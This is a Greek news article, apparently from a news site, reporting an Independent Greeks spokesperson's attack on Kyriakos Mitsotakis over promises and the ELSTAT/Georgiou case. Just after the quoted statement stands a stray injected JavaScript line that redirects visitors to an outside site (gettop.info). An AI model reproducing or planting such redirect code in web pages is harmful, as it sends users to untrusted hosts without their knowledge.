Ανεξάρτητοι Έλληνες σε Κυρ. Μητσοτάκη: Είναι όμηρος της σημιτικής «παρέας»

0
12

 

Σκληρή επίθεση στον Κυριάκο Μητσοτάκη με αφορμή την τηλεοπτική του συνέντευξη στον ΣΚΑΙ εξαπέλυσαν οι Ανεξάρτητοι Έλληνες, που τον κατηγόρησαν μεταξύ άλλων ότι μοιράζει υποσχέσεις χωρίς αντίκρυσμα ενώ «τηρεί αιδήμονα σιωπή για την υπόθεση Γεωργίου».

«Πολύ πρόωρα ο κ. Μητσοτάκης άρχισε να μοιράζει υποσχέσεις! Προφανώς, γιατί ο πολιτικός του λόγος δεν χαίρει της παραμικρής αξιοπιστίας από την συντριπτική πλειονότητα του ελληνικού λαού και ο ίδιος δεν μπορεί να πείσει για τις πραγματικές προθέσεις του, ούτε καν τα στελέχη και τους απλούς ψηφοφόρους της Νέας Δημοκρατίας», δήλωσε η εκπρόσωπος των Ανεξάρτητων Ελλήνων, Μανταλένα Παπαδοπούλου.

«Οι υποσχέσεις που έδωσε είναι χωρίς κανένα αντίκρισμα. Ο σημερινός αρχηγός της ΝΔ κρύβει επιμελώς πίσω από νεφελώδεις διακηρύξεις τις πραγματικές του προθέσεις και τις ακραία νεοφιλελεύθερες απόψεις του. Η μονότονα επαναλαμβανόμενη «εξοικονόμηση δαπανών» και οι περίφημες «μεταρρυθμίσεις» για τις οποίες κάνει συνεχώς λόγο, περιλαμβάνουν αθρόες απολύσεις και ακόμη περισσότερες και δραστικότερες περικοπές σε μισθούς και συντάξεις.

Τίποτα λιγότερο και τίποτα περισσότερο» προσθέτει στη δήλωσή της η κ. Παπαδοπούλου και καταλήγει:

«Προκαλεί επίσης αλγεινή εντύπωση ότι ο κατά τα άλλα λαλίστατος κ. Μητσοτάκης, τηρεί αιδήμονα σιωπή για την υπόθεση Γεωργίου και της εκ των υστέρων διόγκωσης των στοιχείων της ΕΛΣΤΑΤ για το 2009, που νομιμοποίησε την υπαγωγή της χώρας μας στο ΔΝΤ και στο καθεστώς των μνημονίων. Με τη στάση του αποδεικνύει ότι είναι όμηρος της σημιτικής «παρέας» και της «παρέας» Σαμαρά. Μόνο που η σιωπή σε αυτή την περίπτωση δεν είναι χρυσός, αλλά κάρβουνο αναμμένο…». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here